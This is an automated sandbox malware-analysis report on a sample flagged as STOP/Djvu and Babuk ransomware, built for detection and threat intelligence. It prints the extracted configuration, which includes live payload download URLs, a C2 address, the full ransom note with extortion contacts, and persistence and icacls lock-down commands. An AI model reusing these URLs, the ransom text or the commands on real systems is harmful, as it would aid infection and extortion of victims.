Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mU2p71KMss.exe

Overview

General Information

Sample name:mU2p71KMss.exe
renamed because original name is a hash value
Original sample name:e9ff14a975f084f01373d468c0b91a16.exe
Analysis ID:1431118
MD5:e9ff14a975f084f01373d468c0b91a16
SHA1:302d4b9f88ae7b085b56661774d6805156039924
SHA256:f6a6765642f0f8c4b81f45d4e1a9f65505432bbf4c249fa3c96b82d9c712effe
Tags:exeStop
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mU2p71KMss.exe (PID: 348 cmdline: "C:\Users\user\Desktop\mU2p71KMss.exe" MD5: E9FF14A975F084F01373D468C0B91A16)
    • mU2p71KMss.exe (PID: 2716 cmdline: "C:\Users\user\Desktop\mU2p71KMss.exe" MD5: E9FF14A975F084F01373D468C0B91A16)
      • icacls.exe (PID: 1308 cmdline: icacls "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • mU2p71KMss.exe (PID: 1896 cmdline: "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask MD5: E9FF14A975F084F01373D468C0B91A16)
        • mU2p71KMss.exe (PID: 5968 cmdline: "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask MD5: E9FF14A975F084F01373D468C0B91A16)
  • mU2p71KMss.exe (PID: 2828 cmdline: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task MD5: E9FF14A975F084F01373D468C0B91A16)
    • mU2p71KMss.exe (PID: 2164 cmdline: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task MD5: E9FF14A975F084F01373D468C0B91A16)
  • mU2p71KMss.exe (PID: 5524 cmdline: "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart MD5: E9FF14A975F084F01373D468C0B91A16)
    • mU2p71KMss.exe (PID: 4748 cmdline: "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart MD5: E9FF14A975F084F01373D468C0B91A16)
  • mU2p71KMss.exe (PID: 4144 cmdline: "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart MD5: E9FF14A975F084F01373D468C0B91A16)
    • mU2p71KMss.exe (PID: 2616 cmdline: "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart MD5: E9FF14A975F084F01373D468C0B91A16)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test2/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0864PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw0Ftq9GtunuzQZHGiqoG\\\\n8S4cMO\\/Bdgsd+jTtFbVs1bX4OXiYKnMXg4LclKMEHJ2gnP2X09BkzA29UJQlagak\\\\nuAL7j7iRagKeU4tAB8w9rziBYoa9zROqer7J6pf5B11vAvvRq4b3127kAxnMhpgo\\\\ns7MQC7pXIvTkEeGySeG+F5fjSMPUoF1\\/cAg6GuSWOPXoPvXKRA\\/mo+xyHVOKZe2+\\\\nSCpbMHAyMe7o4w\\/i\\/pVjv9g8pRDJtz14qtMuAR38ek+SPJ4PJCxA9e0tOi+p4yNn\\\\nvnFKoL5OwzoF+bvVHnTA7tk4fXB3AyaL9llS0kxEWS7x\\/kNYQyJPh9fimryM03Cy\\\\n1wIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xffe88:$x1: C:\SystemID\PersonalID.txt
    • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0x1002ec:$s1: " --AutoStart
    • 0x100300:$s1: " --AutoStart
    • 0x103f48:$s2: --ForNetRes
    • 0x103f10:$s3: --Admin
    • 0x104390:$s4: %username%
    • 0x1044b4:$s5: ?pid=
    • 0x1044c0:$s6: &first=true
    • 0x1044d8:$s6: &first=false
    • 0x1003f4:$s7: delself.bat
    • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
    00000006.00000002.2025120505.0000000004431000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      Click to see the 46 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      13.2.mU2p71KMss.exe.400000.0.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        13.2.mU2p71KMss.exe.400000.0.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        13.2.mU2p71KMss.exe.400000.0.raw.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
        • 0xffe88:$x1: C:\SystemID\PersonalID.txt
        • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
        • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
        • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
        • 0x1002ec:$s1: " --AutoStart
        • 0x100300:$s1: " --AutoStart
        • 0x103f48:$s2: --ForNetRes
        • 0x103f10:$s3: --Admin
        • 0x104390:$s4: %username%
        • 0x1044b4:$s5: ?pid=
        • 0x1044c0:$s6: &first=true
        • 0x1044d8:$s6: &first=false
        • 0x1003f4:$s7: delself.bat
        • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
        • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
        5.2.mU2p71KMss.exe.400000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          5.2.mU2p71KMss.exe.400000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          Click to see the 55 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\mU2p71KMss.exe, ProcessId: 2716, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper

          Snort Signatures

          Timestamp:04/24/24-15:57:00.032327
          SID:2833438
          Source Port:49707
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/24/24-15:57:01.094676
          SID:2036335
          Source Port:80
          Destination Port:49707
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: mU2p71KMss.exeAvira: detected
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeAvira: detection malicious, Label: HEUR/AGEN.1313019
          Found malware configuration
          Source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test2/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0864PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeReversingLabs: Detection: 44%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: mU2p71KMss.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,1_2_0040E870
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040EA51 CryptDestroyHash,CryptReleaseContext,1_2_0040EA51
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,1_2_0040EAA0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040EC68 CryptDestroyHash,CryptReleaseContext,1_2_0040EC68
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,1_2_00410FC0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00411178 CryptDestroyHash,CryptReleaseContext,1_2_00411178
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,5_2_0040E870
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040EA51 CryptDestroyHash,CryptReleaseContext,5_2_0040EA51
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,5_2_0040EAA0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040EC68 CryptDestroyHash,CryptReleaseContext,5_2_0040EC68
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,5_2_00410FC0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00411178 CryptDestroyHash,CryptReleaseContext,5_2_00411178
          Source: mU2p71KMss.exe, 00000007.00000002.3243271467.00000000007A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_8361a420-5

          Compliance

          barindex
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\mU2p71KMss.exeUnpacked PE file: 1.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\mU2p71KMss.exeUnpacked PE file: 5.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 7.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 10.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeUnpacked PE file: 13.2.mU2p71KMss.exe.400000.0.unpack
          Source: mU2p71KMss.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile created: C:\_README.txtJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile created: C:\Users\user\_README.txtJump to behavior
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: mU2p71KMss.exe, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: CC:\poviwodi\xik\bihunow44-jeholo43\bikeyomipacase\kagakawotenot.pdb source: mU2p71KMss.exe, mU2p71KMss.exe.1.dr
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: mU2p71KMss.exe, 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\poviwodi\xik\bihunow44-jeholo43\bikeyomipacase\kagakawotenot.pdb source: mU2p71KMss.exe, mU2p71KMss.exe.1.dr
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,1_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,1_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,1_2_0040FB98
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,5_2_0040FB98

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.5:49707 -> 62.150.232.50:80
          Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 62.150.232.50:80 -> 192.168.2.5:49707
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://cajgtus.com/test2/get.php
          Source: Joe Sandbox ViewIP Address: 104.21.65.24 104.21.65.24
          Source: Joe Sandbox ViewASN Name: QNETKuwaitKW QNETKuwaitKW
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_0040CF10
